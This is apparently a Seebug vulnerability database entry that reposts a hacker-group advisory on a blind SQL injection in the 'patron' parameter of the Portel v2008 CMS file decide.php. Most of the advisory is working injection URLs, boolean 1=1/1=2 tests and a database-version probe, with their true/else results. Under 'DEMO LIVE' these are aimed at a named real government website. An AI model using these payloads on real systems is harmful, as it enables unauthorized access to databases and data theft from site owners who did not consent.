Portel v2008 (decide.php patron) Blind SQL Injection Vulnerability

2009-08-06T00:00:00
ID SSV:12002
Type seebug
Reporter Root
Modified 2009-08-06T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ------------------------------------------------------------------------------
Portel (patron) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------


 #####################################################
 # [+] Author        :  Chip D3 Bi0s                 #
 # [+] Email         :  chipdebios[alt+64]gmail.com  #
 # [+] Vulnerability :  Blind SQL injection          #
 # [+] Group         :  LatinHackTeam                #
 #####################################################

**********************************************************************
 Info Cms:
 * Name      : Portel
 * Web       : http://www.porteleditor.com
 * dowloand  : http://www.porteleditor.com/instalacion/portelv2008.zip
               http://rapidshare.com/files/263383411/portelv2008.zip.html
 * Country   : Colombia
               
**********************************************************************


Example:
http://localHost/path/libreria/php/decide.php?patron=n<Blind Sql Code>
n = patron valid


DEMO LIVE:

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=1/*
true

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+1=2/*
else

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=4/*
else

http://www.bogota.gov.co/portel/libreria/php/decide.php?patron=01.'+and+substring(@@version,1,1)=5/*
true


etc, etc....

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++